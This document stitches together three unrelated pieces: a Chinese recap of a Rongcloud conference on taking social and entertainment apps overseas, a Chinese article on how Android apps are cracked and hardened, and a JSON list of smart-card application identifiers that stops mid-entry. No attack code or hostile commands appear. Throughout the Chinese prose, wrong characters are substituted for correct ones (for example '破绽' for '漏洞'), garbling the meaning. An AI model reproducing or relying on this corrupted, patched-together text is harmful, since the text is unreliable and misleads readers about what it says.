近期，“纵浪潜海 · 2023 融云社交泛娱乐出海赋能会”在上海、广州相继举办。移步【融云寰球互联网通信云】，回复【出海】获取PPT。 作为更业余的出海服务商，融云联结多家出海服务企业，从热门出海地区的个性洞察、玩法解决方案、技术服务教训、出海案例解析等方向进行分享，全方位助力出海企业把握增长红利，实现业务增长。 在主题演讲中，Aptoide 商务总监吴绪兰、融云出海行业专家冯思、数美科技生态单干总监郝一君别离就用户增长、场景玩法、平安合规开展了深度分享。 如何开掘 海内利用市场流量Aptoide 商务总监吴绪兰（右起第二位） 依据《2023 游戏 App 营销现状报告》，从 2021 年到 2022 年，iOS 的 CPI（每激活老本）增长了 88%。这意味着，App 获客老本简直翻倍。而随着海内隐衷政策的逐渐降级，寰球获客老本还将大幅上涨。 如何更好地获取用户、开掘流量，成为利用生存的重中之重。 目前，利用出海有三大惯例获客渠道：流量媒体、视频广告和第三方利用商店。 以 Google、Meta 为代表的媒体平台，是新产品后期获客比拟好的渠道抉择。但对于上线两三年甚至更长时间的利用来说，在竞价模式下，流量老本会越来越高。 视频广告是最近疾速成长起来的获客渠道，但用户品质存在肯定晋升空间。 此外，海内市场有泛滥各具特色的三方利用商店，也在为利用出海减少新的市场机会。 每个国家和地区，都会有一些本地的利用商店，它们次要分为三类： 华为、OPPO、vivo、小米、三星、Q Mobile、Cherry Mobile 等手机利用商店；相似于国内的 TapTap 和利用宝的三方安卓商店；在海内，电信运营商预装模式尚属新兴的流量渠道，目前在欧美地区绝对成熟，曾经造成商业化。 这个宏大的三方利用商店渠道，也是出海开发者不容忽视的微小流量高地。 实时互动再进阶 社交泛娱乐出海新引擎融云出海行业专家冯思 中国互联网出海，以 2008 年的工具出海浪潮为始算起，曾经走过了 15 年历程。这个过程中，出海企业实现了从新兴市场到高阶市场，从模拟、追随到引领，从工具到到娱乐和内容出海等层面的全方位降级。 以后如日中天的社交泛娱乐出海，也是中国出海开发者次要参加的赛道之一，包含 1V1 音视频、音频社交、短视频、直播、游戏社交、元宇宙社交等细分品类。 面对与国内对立市场齐全不同的全新竞争环境，出海开发者重构产品设计、用户经营、推广营销等因素，须要号召一个甚至多个弱小的助力。 这包含 IaaS 层的云服务器、云存储、云数据库、云平安及直播须要的 CDN 服务；PaaS 层的通信双核心能力 IM 和 RTC，及翻译、美颜、审核、曲库、虚构形象等周边性能；生态方面还波及买量、领取、媒体、MCN 等服务。 作为最早布局全球化的通信云服务商之一，融云搭建笼罩寰球 233 个国家和地区的寰球通信网，是业内首家上线海内数据中心的通信服务商。 随着寰球网络情况越来越简单，每个国家和地区对于网络协议的反对也各不相同。近期，融云寰球通信网降级至第四代，交融了多家头部服务商，通过多服务商多协定的反对来实现不同地区的调度优化，打造宏大、无拥塞的寰球网络。 迄今为止，在出海服务方面，融云日音讯峰值达 440 亿+，日均音讯量 92 亿+，日均沉闷数 4500 万+，SDK 触达用户数 44 亿+。 ...

App被破解的危险App破解的各种“姿态”在网上曾经泛滥成灾了，从App破解的入门常识到逆向工具下载，从破解技术视频到全图文教程，真的只有你想不到，没有他们做不到。 一旦App被破解，不仅使用者的照片、身份证、手机号、分割住址、邮箱和领取明码等敏感信息会泄露，还可能感化手机的操作系统，进而导致手机被入侵篡改，乃至成为攻击者操控的“僵尸网络”中的一部分。 对于没有成熟风控体系的开发者或者初创团队来说，App的平安至关重要，不然可能最初变成“为别人做嫁衣”。 被入侵起因App为什么会被破解入侵？咱们不从伦理或者市场层面来说，而是从技术层面来了解一下。 大体上，常见的起因包含： 1.逆向工程：黑客能够应用逆向工程技术，通过剖析应用程序的代码和二进制文件，理解应用程序的外部机制，以便发现破绽并进行攻打。 2.动静调试：黑客能够应用动静调试工具，例如调试器和反汇编器，来跟踪应用程序的执行过程和外部变量的值，以便发现破绽并进行攻打。 3.破绽利用：应用程序中的破绽可能会被黑客利用，例如缓冲区溢出、代码注入、SQL注入等等，以取得对应用程序的控制权。 4.破解工具：黑客能够应用破解工具来绕过应用程序的许可证验证和其余安全措施，以便在未经受权的状况下应用应用程序。 5.网络攻击：应用程序可能会受到网络攻击，例如拒绝服务攻打、中间人攻打、网络嗅探等等，以取得对应用程序的控制权或窃取用户数据。 然而咱们这次从更细节的层面来说： 安卓App的开发除了局部性能采纳C/C++编码外，其余次要都是采纳Java进行编码开发性能。Java源码最终编译成smali字符码，以classes.dex保留在App的APK中。 Java是一种解释性语言，功能强大，易用性强。初学者能轻松地学习Java，并编写简略的应用程序。而且Java的根本类库（JDK）是开源的，这就使很多Java开发的利用被逆向破解的门槛很低。目前市面上有大量的逆向破解工具，例如：Dex2Jar、JEB、JD-GUI等等。只有懂代码编程，利用这些工具就能够破解市面上那些进攻单薄、存在大量安全漏洞的App。这就很好了解为什么会有如此多人去搜寻“App破解”了。 之前曾有媒体报道，有网络黑产专门从各种渠道找到App的apk，而后将apk文件逆向破解，再植入广告、病毒代码，最初从新打包投入公开市场，当不明真相的网友将带病毒广告的App下载后，带来的损失可能难以估计。 如何爱护App？这个问题，不论在哪里搜寻，答案都会是“加固”。通过加固能够对App进行安全性强化，肯定水平上达到防破解和避免被二次打包的成果。 App加固次要对源码的爱护，混同、常量字符串加密、指令虚机转换；对汇编插花（防IDA F5）、控制流扁平化等；抹除二进制ELF信息、ELF壳、自定义Linker等；对安卓的可执行文件加壳，抽取可执行文件指定等。此外，还能够对js、html、图片、自定义资源进行爱护，对anti-debug等环境进行查看等。 App平安防护技术已经验了动静加载、不落地加载、指令抽离、指令转换/VMP、虚机源码爱护等五个阶段。每一阶段的平安技术都是一次降级。这五代技术有什么特点呢？（手都敲痛了！） 其实这些内容，之前也讲过，这次用表格间接整理出来了，没有带上代码。感兴趣的敌人能够去翻翻我之前的记录。 以上。

目前能够收集到的，绝对比拟新的AID列表，连CCC的数字钥匙/FIDO U2F的AID都有了。 [ { "AID": "315041592E5359532E4444463031", "Vendor": "EMV", "Country": "United States", "Name": "EMV Payment System Environment - PSE (1PAY.SYS.DDF01)", "Description": "", "Type": "" }, { "AID": "325041592E5359532E4444463031", "Vendor": "EMV", "Country": "United States", "Name": "EMV Proximity Payment System Environment - PPSE (2PAY.SYS.DDF01)", "Description": "Visa payWave for Mobile", "Type": "" }, { "AID": "44464D46412E44466172653234313031", "Vendor": "DeviceFidelity", "Country": "United States", "Name": "DeviceFidelity In2Pay DFare applet", "Description": "http://www.nfcworld.com/2010/11/24/35207/devicefidelity-adds-nfc-support-for-android-and-mifare/", "Type": "" }, { "AID": "A00000000101", "Vendor": "PBS Danmnt A/S", "Country": "Denmark", "Name": "MUSCLE Card Applet", "Description": "(Unlicensed use of this RID. Proposal to use A000000323 instead)", "Type": "" }, { "AID": "A000000003000000", "Vendor": "Visa International", "Country": "United States", "Name": "(VISA) Card Manager", "Description": "Used by most GP2.1.1 cards / Oberthur OP201 cards. Visa Proprietary Card Manager AID for OpenPlatform cards (visa.openplatform).", "Type": "GP" }, { "AID": "A00000000300037561", "Vendor": "Visa International", "Country": "United States", "Name": "Bonuscard", "Description": "", "Type": "" }, { "AID": "A00000000305076010", "Vendor": "Visa International", "Country": "United States", "Name": "VISA ELO Credit", "Description": "", "Type": "EMV" }, { "AID": "A0000000031010", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Debit/Credit (Classic)", "Description": "Standard/Gold VISA credit card", "Type": "EMV" }, { "AID": "A000000003101001", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Credit", "Description": "", "Type": "EMV" }, { "AID": "A000000003101002", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Debit", "Description": "", "Type": "EMV" }, { "AID": "A0000000032010", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Electron", "Description": "VISA Electron (Debit)", "Type": "EMV" }, { "AID": "A0000000032020", "Vendor": "Visa International", "Country": "United States", "Name": "VISA", "Description": "V PAY", "Type": "EMV" }, { "AID": "A0000000033010", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Interlink", "Description": "VISA Interlink", "Type": "EMV" }, { "AID": "A0000000034010", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Specific", "Description": "Visa Specific", "Type": "EMV" }, { "AID": "A0000000035010", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Specific", "Description": "Visa Specific", "Type": "EMV" }, { "AID": "A000000003534441", "Vendor": "Visa International", "Country": "United States", "Name": "Schlumberger Security Domain", "Description": "", "Type": "GP" }, { "AID": "A0000000035350", "Vendor": "Visa International", "Country": "United States", "Name": "Security Domain", "Description": "OCS Oberthur Card System Security Domain Package AID / VGP Card Manager (for ISD and ASD)", "Type": "GP" }, { "AID": "A000000003535041", "Vendor": "Visa International", "Country": "United States", "Name": "Security Domain", "Description": "OCS Oberthur Card System Security Domain Applet AID / VGP Card Manager (for ISD and ASD)", "Type": "GP" }, { "AID": "A0000000036010", "Vendor": "Visa International", "Country": "United States", "Name": "Domestic Visa Cash Stored Value", "Description": "", "Type": "EMV" }, { "AID": "A0000000036020", "Vendor": "Visa International", "Country": "United States", "Name": "International Visa Cash Stored Value", "Description": "", "Type": "EMV" }, { "AID": "A0000000038002", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Auth, VisaRemAuthen EMV-CAP (DPA)", "Description": "VISA Auth dynamic passcode authentication (DPA). Used by Barclays/HBOS", "Type": "EMV" }, { "AID": "A0000000038010", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Plus", "Description": "VISA plus", "Type": "EMV" }, { "AID": "A0000000039010", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Loyalty", "Description": "", "Type": "EMV" }, { "AID": "A000000003999910", "Vendor": "Visa International", "Country": "United States", "Name": "VISA Proprietary ATM", "Description": "", "Type": "EMV" }, { "AID": "A0000000040000", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard Card Manager", "Description": "Security Domain", "Type": "GP" }, { "AID": "A00000000401", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard PayPass", "Description": "AEPM (Association Europenne Payez Mobile)", "Type": "EMV" }, { "AID": "A0000000041010", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard Credit/Debit (Global)", "Description": "Standard MasterCard", "Type": "EMV" }, { "AID": "A00000000410101213", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard Credit", "Description": "Standard MasterCard", "Type": "EMV" }, { "AID": "A00000000410101215", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard Credit", "Description": "Standard MasterCard", "Type": "EMV" }, { "AID": "A0000000041010BB5449435301", "Vendor": "Mastercard International", "Country": "United States", "Name": "[UNKNOWN]", "Description": "Some co-branded card", "Type": "" }, { "AID": "A0000000042010", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard Specific", "Description": "MasterCard Specific", "Type": "EMV" }, { "AID": "A0000000042203", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard Specific", "Description": "MasterCard U.S. Maestro", "Type": "" }, { "AID": "A0000000043010", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard Specific", "Description": "MasterCard Specific", "Type": "EMV" }, { "AID": "A0000000043060", "Vendor": "Mastercard International", "Country": "United States", "Name": "Maestro (Debit)", "Description": "Maestro (Debit) Card", "Type": "EMV" }, { "AID": "A000000004306001", "Vendor": "Mastercard International", "Country": "United States", "Name": "Maestro (Debit)", "Description": "Maestro (Debit) Card", "Type": "EMV" }, { "AID": "A0000000044010", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard Specific", "Description": "MasterCard Specific", "Type": "EMV" }, { "AID": "A0000000045010", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard Specific", "Description": "MasterCard Specific", "Type": "EMV" }, { "AID": "A0000000045555", "Vendor": "Mastercard International", "Country": "United States", "Name": "APDULogger", "Description": "AID on Cirrus Test Card", "Type": "" }, { "AID": "A0000000046000", "Vendor": "Mastercard International", "Country": "United States", "Name": "Cirrus", "Description": "Mastercard Cirrus (Interbank Network) ATM card only", "Type": "EMV" }, { "AID": "A0000000048002", "Vendor": "Mastercard International", "Country": "United States", "Name": "SecureCode Auth EMV-CAP", "Description": "Chip Authentication Protocol (CAP). Works with NatWest or SecureCode Aut", "Type": "EMV" }, { "AID": "A0000000049999", "Vendor": "Mastercard International", "Country": "United States", "Name": "MasterCard PayPass", "Description": "", "Type": "EMV" }, { "AID": "A0000000050001", "Vendor": "Switch Card Services Ltd.", "Country": "United Kingdom", "Name": "Maestro UK", "Description": "UK Domestic Maestro - Switch (debit card)", "Type": "EMV" }, { "AID": "A0000000050002", "Vendor": "Switch Card Services Ltd.", "Country": "United Kingdom", "Name": "Solo", "Description": "UK Domestic Maestro - Switch (debit card)", "Type": "EMV" }, { "AID": "A0000000090001FF44FF1289", "Vendor": "ETSI", "Country": "France", "Name": "Orange", "Description": "Orange UK", "Type": "" }, { "AID": "A0000000101030", "Vendor": "Europay International", "Country": "Belgium", "Name": "Maestro-CH", "Description": "", "Type": "" }, { "AID": "A00000001800", "Vendor": "GEMPLUS", "Country": "France", "Name": "Gemplus ", "Description": "", "Type": "" }, { "AID": "A0000000181001", "Vendor": "GEMPLUS", "Country": "France", "Name": "com.gemplus.javacard.util packages", "Description": "", "Type": "" }, { "AID": "A000000018434D", "Vendor": "GEMPLUS", "Country": "France", "Name": "Gemplus card manager", "Description": "434D = CM (ascii). Security domain for some GCX/GXP cards (GemXpresso Pro) (Gemalto)", "Type": "GP" }, { "AID": "A000000018434D00", "Vendor": "GEMPLUS", "Country": "France", "Name": "Gemplus Security Domain", "Description": "(Gemalto)", "Type": "GP" }, { "AID": "A00000002401", "Vendor": "Midland Bank Plc", "Country": "United Kingdom", "Name": "Self Service", "Description": "", "Type": "EMV" }, { "AID": "A000000025", "Vendor": "American Express", "Country": "United Kingdom", "Name": "American Express", "Description": "", "Type": "EMV" }, { "AID": "A0000000250000", "Vendor": "American Express", "Country": "United Kingdom", "Name": "American Express", "Description": "American Express (Credit/Debit)", "Type": "EMV" }, { "AID": "A00000002501", "Vendor": "American Express", "Country": "United Kingdom", "Name": "American Express", "Description": "AEIPS-compliant (A-E contact EMV) payment application", "Type": "EMV" }, { "AID": "A000000025010104", "Vendor": "American Express", "Country": "United Kingdom", "Name": "American Express", "Description": "", "Type": "" }, { "AID": "A000000025010402", "Vendor": "American Express", "Country": "United Kingdom", "Name": "American Express", "Description": "", "Type": "EMV" }, { "AID": "A000000025010701", "Vendor": "American Express", "Country": "United Kingdom", "Name": "ExpressPay", "Description": "", "Type": "EMV" }, { "AID": "A000000025010801", "Vendor": "American Express", "Country": "United Kingdom", "Name": "American Express", "Description": "", "Type": "EMV" }, { "AID": "A0000000291010", "Vendor": "LINK Interchange Network Ltd", "Country": "United Kingdom", "Name": "Link / American Express", "Description": "Link (UK) ATM Network, or AMEX (Portugal)", "Type": "EMV" }, { "AID": "A00000002945087510100000", "Vendor": "LINK Interchange Network Ltd", "Country": "United Kingdom", "Name": "CO-OP", "Description": "", "Type": "" }, { "AID": "A00000002949034010100001", "Vendor": "LINK Interchange Network Ltd", "Country": "United Kingdom", "Name": "HSBC", "Description": "", "Type": "" }, { "AID": "A00000002949282010100000", "Vendor": "LINK Interchange Network Ltd", "Country": "United Kingdom", "Name": "Barclay", "Description": "", "Type": "" }, { "AID": "A000000029564182", "Vendor": "LINK Interchange Network Ltd", "Country": "United Kingdom", "Name": "HAFX", "Description": "", "Type": "" }, { "AID": "A00000003029057000AD13100101FF", "Vendor": "Schlumberger Industries Identif d'Encarteur PR050", "Country": "France", "Name": "BelPIC (Belgian Personal Identity Card) JavaCard Applet", "Description": "Schlumberger (Gemalto) RID", "Type": "" }, { "AID": "A0000000308000000000280101", "Vendor": "Schlumberger Industries Identif d'Encarteur PR050", "Country": "France", "Name": "Gemalto .NET Card AID", "Description": "", "Type": "" }, { "AID": "A0000000421010", "Vendor": "Groupement des Cartes Bancaires 'CB'", "Country": "France", "Name": "Cartes Bancaire EMV Card", "Description": "Groupement des Cartes Bancaires (France)", "Type": "EMV" }, { "AID": "A0000000422010", "Vendor": "Groupement des Cartes Bancaires 'CB'", "Country": "France", "Name": "", "Description": "", "Type": "EMV" }, { "AID": "A0000000423010", "Vendor": "Groupement des Cartes Bancaires 'CB'", "Country": "France", "Name": "", "Description": "", "Type": "EMV" }, { "AID": "A0000000424010", "Vendor": "Groupement des Cartes Bancaires 'CB'", "Country": "France", "Name": "", "Description": "", "Type": "EMV" }, { "AID": "A0000000425010", "Vendor": "Groupement des Cartes Bancaires 'CB'", "Country": "France", "Name": "", "Description": "", "Type": "EMV" }, { "AID": "A0000000426010", "Vendor": "Groupement des Cartes Bancaires 'CB'", "Country": "France", "Name": "Contactless payment using Apple Pay", "Description": "", "Type": "EMV" }, { "AID": "A00000005945430100", "Vendor": "Zentraler Kreditausschuss (ZKA)", "Country": "Germany", "Name": "Girocard Electronic Cash", "Description": "", "Type": "" }, { "AID": "A000000063504B43532D3135", "Vendor": "RSA Laboratories", "Country": "United States", "Name": "PKCS-15", "Description": "RSA PKCS-15 PKI application (Predecessor to ISO7816-15) / ID-card in Finland", "Type": "" }, { "AID": "A0000000635741502D57494D", "Vendor": "RSA Laboratories", "Country": "United States", "Name": "WAP-WIM", "Description": "WAP (Wireless Application Protocol) Identity Module / Wireless Identification Module", "Type": "" }, { "AID": "A00000006510", "Vendor": "JCB CO., LTD.", "Country": "Japan", "Name": "JCB", "Description": "Japan Credit Bureau", "Type": "EMV" }, { "AID": "A0000000651010", "Vendor": "JCB CO., LTD.", "Country": "Japan", "Name": "JCB J Smart Credit", "Description": "Japan Credit Bureau", "Type": "EMV" }, { "AID": "A00000006900", "Vendor": "Socit Europenne de Monnaie Electronique SEME", "Country": "France", "Name": "Moneo", "Description": "", "Type": "EMV" }, { "AID": "A000000077010000021000000000003B", "Vendor": "Oberthur Technologies", "Country": "France", "Name": "Visa AEPN", "Description": "", "Type": "EMV" }, { "AID": "A0000000790100", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv2 PKI ID", "Description": "Identity Key", "Type": "" }, { "AID": "A0000000790101", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv2 PKI Sign", "Description": "Digital Signature Key", "Type": "" }, { "AID": "A0000000790102", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv2 PKI Enc", "Description": "Key Management Key", "Type": "" }, { "AID": "A00000007901F0", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv1 PKI Identity Key", "Description": "Re-directs to CACv2 PKI Identity key", "Type": "" }, { "AID": "A00000007901F1", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv1 PKI Digital Signature Key", "Description": "Re-directs to CACv2 Digital Signature key", "Type": "" }, { "AID": "A00000007901F2", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv1 PKI Key Management Key", "Description": "Re-directs to CACv2 Key Management key", "Type": "" }, { "AID": "A0000000790200", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv2 DoD Person", "Description": "DoD Demographic", "Type": "" }, { "AID": "A0000000790201", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv2 DoD Personnel", "Description": "DoD Demographic", "Type": "" }, { "AID": "A00000007902FB", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv1 BC", "Description": "General Configuration", "Type": "" }, { "AID": "A00000007902FD", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv1 BC", "Description": "PKI Certificate Attributes", "Type": "" }, { "AID": "A00000007902FE", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv1 BC", "Description": "PKI Cert", "Type": "" }, { "AID": "A0000000790300", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CACv2 Access Control Applet", "Description": "CAC PIN / ID PIN Management Applet", "Type": "" }, { "AID": "A0000000791201", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CAC JDM", "Description": "Joint Data Model. BCAdmin", "Type": "" }, { "AID": "A0000000791202", "Vendor": "Activcard Europe S.A.", "Country": "France", "Name": "CAC JDM", "Description": "Joint Data Model. BCMedical", "Type": "" }, { "AID": "A0000000871002FF49FF0589", "Vendor": "Third Generation Partnership Project (3GPP)", "Country": "France", "Name": "Telenor USIM", "Description": "", "Type": "USIM" }, { "AID": "A00000008810200105C100", "Vendor": "Buypass AS", "Country": "Norway", "Name": "BuyPass BIDA", "Description": "Used by norwegian public betting company Norsk-Tipping", "Type": "BuyPass" }, { "AID": "A000000088102201034221", "Vendor": "Buypass AS", "Country": "Norway", "Name": "BuyPass BEID (BuyPass Electronic ID)", "Description": "", "Type": "BuyPass" }, { "AID": "A000000088102201034321", "Vendor": "Buypass AS", "Country": "Norway", "Name": "BuyPass BEID (BuyPass Electronic ID)", "Description": "", "Type": "BuyPass" }, { "AID": "A0000000960200", "Vendor": "Sa Proton World International N.V.", "Country": "Belgium", "Name": "Proton World International Security Domain", "Description": "Proton, which is owned in part by Visa International and American Express Co., is in three other European countries: the original Proton program in Belgium, Chipknip in the Netherlands, and Cash in Switzerland", "Type": "GP" }, { "AID": "A000000098", "Vendor": "Visa USA", "Country": "United States", "Name": "Debit Card", "Description": "Bank of America Debit Card", "Type": "EMV" }, { "AID": "A0000000980840", "Vendor": "Visa USA", "Country": "United States", "Name": "Visa Common Debit", "Description": "", "Type": "" }, { "AID": "A0000000980848", "Vendor": "Visa USA", "Country": "United States", "Name": "Debit Card", "Description": "Schwab Bank Debit Card", "Type": "EMV" }, { "AID": "A0000001110101", "Vendor": "Die Post Postfinance", "Country": "Switzerland", "Name": "Postcard", "Description": "", "Type": "" }, { "AID": "A0000001160300", "Vendor": "GSA - TFCS", "Country": "United States", "Name": "PIV CHUID", "Description": "CHUID", "Type": "" }, { "AID": "A0000001166010", "Vendor": "GSA - TFCS", "Country": "United States", "Name": "PIV Fingerprints", "Description": "Fingerprints", "Type": "" }, { "AID": "A0000001166030", "Vendor": "GSA - TFCS", "Country": "United States", "Name": "PIV Facial Image", "Description": "Facial Image", "Type": "" }, { "AID": "A0000001169000", "Vendor": "GSA - TFCS", "Country": "United States", "Name": "PIV Security Object", "Description": "Security Object", "Type": "" }, { "AID": "A000000116A001", "Vendor": "GSA - TFCS", "Country": "United States", "Name": "PIV Authentication Key", "Description": "PIV Authentication Key", "Type": "" }, { "AID": "A0000006472F0001", "Vendor": "FIDO authenticator", "Country": "global", "Name": "U2F/FIDO2 authenticator", "Description": "U2F and/or FIDO2 authenticator", "Type": "" }, { "AID": "A000000116DB00", "Vendor": "GSA - TFCS", "Country": "United States", "Name": "CCC", "Description": "Card Capability Container", "Type": "" }, { "AID": "A000000118010000", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_Verkehr", "Description": "Domestic Loyalty Program (Version 1.3)", "Type": "" }, { "AID": "A000000118020000", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_Partner", "Description": "Domestic Loyalty Program (Version 1.3)", "Type": "" }, { "AID": "A000000118030000", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_Schlerdaten", "Description": "Domestic Loyalty Program (Version 1.3)", "Type": "" }, { "AID": "A000000118040000", "Vendor": "Austria Card", "Country": "Austria", "Name": "DF_KEP_SIG", "Description": "Domestic Loyalty Program (Version 1.32)", "Type": "" }, { "AID": "A0000001184543", "Vendor": "Austria Card", "Country": "Austria", "Name": "Digital Signature (SSCA)", "Description": "Digital Signature Application", "Type": "" }, { "AID": "A000000118454E", "Vendor": "Austria Card", "Country": "Austria", "Name": "Encryption Application", "Description": "Encryption Application (Version 1.10)", "Type": "" }, { "AID": "A0000001211010", "Vendor": "PBS Danmark A/S", "Country": "Denmark", "Name": "Dankort (VISA GEM Vision)", "Description": "Danish domestic debit card", "Type": "EMV" }, { "AID": "A0000001320001", "Vendor": "Java Card Forum", "Country": "United States", "Name": "org.javacardforum.javacard.biometry", "Description": "", "Type": "" }, { "AID": "A0000001408001", "Vendor": "TDS TODOS DATA SYSTEM AB", "Country": "Sweden", "Name": "eCode", "Description": "", "Type": "" }, { "AID": "A0000001410001", "Vendor": "Associazione Bancaria Italiana", "Country": "Italy", "Name": "PagoBANCOMAT", "Description": "CoGeBan Consorzio BANCOMAT (Italian domestic debit card)", "Type": "EMV" }, { "AID": "A0000001510000", "Vendor": "GlobalPlatform, Inc.", "Country": "United States", "Name": "Global Platform Security Domain AID", "Description": "GP Card Manager", "Type": "GP" }, { "AID": "A00000015153504341534400", "Vendor": "GlobalPlatform, Inc.", "Country": "United States", "Name": "CASD_AID", "Description": "SPCASD", "Type": "GP" }, { "AID": "A0000001523010", "Vendor": "Diners Club International Ltd.", "Country": "United States", "Name": "Discover, Pulse D Pas", "Description": "Discover Card", "Type": "EMV" }, { "AID": "A0000001524010", "Vendor": "Diners Club International Ltd.", "Country": "United States", "Name": "Discover", "Description": "Discover Debit Common Card", "Type": "EMV" }, { "AID": "A0000001544442", "Vendor": "Banrisul - Banco do Estado do Rio Grande do SUL - S.A.", "Country": "Brazil", "Name": "Banricompras Debito", "Description": "Banrisul (Brazil)", "Type": "EMV" }, { "AID": "A0000001570010", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "AMEX", "Description": "", "Type": "" }, { "AID": "A0000001570020", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "MasterCard", "Description": "", "Type": "" }, { "AID": "A0000001570021", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "Maestro", "Description": "", "Type": "" }, { "AID": "A0000001570022", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "Maestro", "Description": "", "Type": "" }, { "AID": "A0000001570023", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "CASH", "Description": "", "Type": "" }, { "AID": "A0000001570030", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "VISA", "Description": "", "Type": "" }, { "AID": "A0000001570031", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "VISA", "Description": "", "Type": "" }, { "AID": "A0000001570040", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "JCB", "Description": "", "Type": "" }, { "AID": "A0000001570050", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "Postcard", "Description": "", "Type": "" }, { "AID": "A0000001570051", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "Postcard", "Description": "", "Type": "" }, { "AID": "A0000001570100", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "MCard", "Description": "", "Type": "" }, { "AID": "A0000001570104", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "MyOne", "Description": "", "Type": "" }, { "AID": "A0000001570109", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "Mediamarkt Card", "Description": "", "Type": "" }, { "AID": "A000000157010A", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "Gift Card", "Description": "", "Type": "" }, { "AID": "A000000157010B", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "Bonuscard", "Description": "", "Type": "" }, { "AID": "A000000157010C", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "WIRCard", "Description": "", "Type": "" }, { "AID": "A000000157010D", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "Power Card", "Description": "", "Type": "" }, { "AID": "A0000001574443", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "DINERS CLUB", "Description": "", "Type": "" }, { "AID": "A0000001574444", "Vendor": "Zhlke Engineering AG", "Country": "Switzerland", "Name": "Supercard Plus", "Description": "", "Type": "" }, { "AID": "A000000167413000FF", "Vendor": "IBM", "Country": "Germany", "Name": "JCOP Identify Applet", "Description": "identify in JCOP-tools returns eg 27 34 01 2E 00 00 00 00 4E 58 37 35 31 41 00 03 28 62 B3 6A 82", "Type": "JCOP" }, { "AID": "A000000167413001", "Vendor": "IBM", "Country": "Germany", "Name": "FIPS 140-2", "Description": "", "Type": "" }, { "AID": "A000000172950001", "Vendor": "Financial Information Service Co. Ltd.", "Country": "Taiwan", "Name": "BAROC Financial Application Taiwan", "Description": "The Bankers Association of the Republic of China", "Type": "EMV" }, { "AID": "A000000177504B43532D3135", "Vendor": "Ministre de L'Intrieur", "Country": "Belgium", "Name": "BelPIC (Belgian Personal Identity Card)", "Description": "", "Type": "" }, { "AID": "A0000001850002", "Vendor": "Post Office Limited", "Country": "United Kingdom", "Name": "UK Post Office Account card", "Description": "", "Type": "EMV" }, { "AID": "A0000001884443", "Vendor": "Diners Club Switzerland Ltd", "Country": "Switzerland", "Name": "DINERS CLUB", "Description": "", "Type": "" }, { "AID": "A0000002040000", "Vendor": "Association for Payment Clearing Services", "Country": "United Kingdom", "Name": "", "Description": "", "Type": "" }, { "AID": "A0000002281010", "Vendor": "Saudi Arabian Monetary Agency (SAMA)", "Country": "Kingdom of Saudi Arabia", "Name": "SPAN (M/Chip)", "Description": "SPAN2 (Saudi Payments Network) - Saudi Arabia domestic credit/debit card (Saudi Arabia Monetary Agency)", "Type": "EMV" }, { "AID": "A0000002282010", "Vendor": "Saudi Arabian Monetary Agency (SAMA)", "Country": "Kingdom of Saudi Arabia", "Name": "SPAN (VIS)", "Description": "SPAN2 (Saudi Payments Network) - Saudi Arabia domestic credit/debit card (Saudi Arabia Monetary Agency)", "Type": "EMV" }, { "AID": "A00000022820101010", "Vendor": "Saudi Arabian Monetary Agency (SAMA)", "Country": "Kingdom of Saudi Arabia", "Name": "SPAN", "Description": "SPAN2 (Saudi Payments Network) - Saudi Arabia domestic credit/debit card (Saudi Arabia Monetary Agency)", "Type": "" }, { "AID": "A0000002471001", "Vendor": "ISO JTC1/SC17/WG3", "Country": "United Kingdom", "Name": "Machine Readable Travel Documents 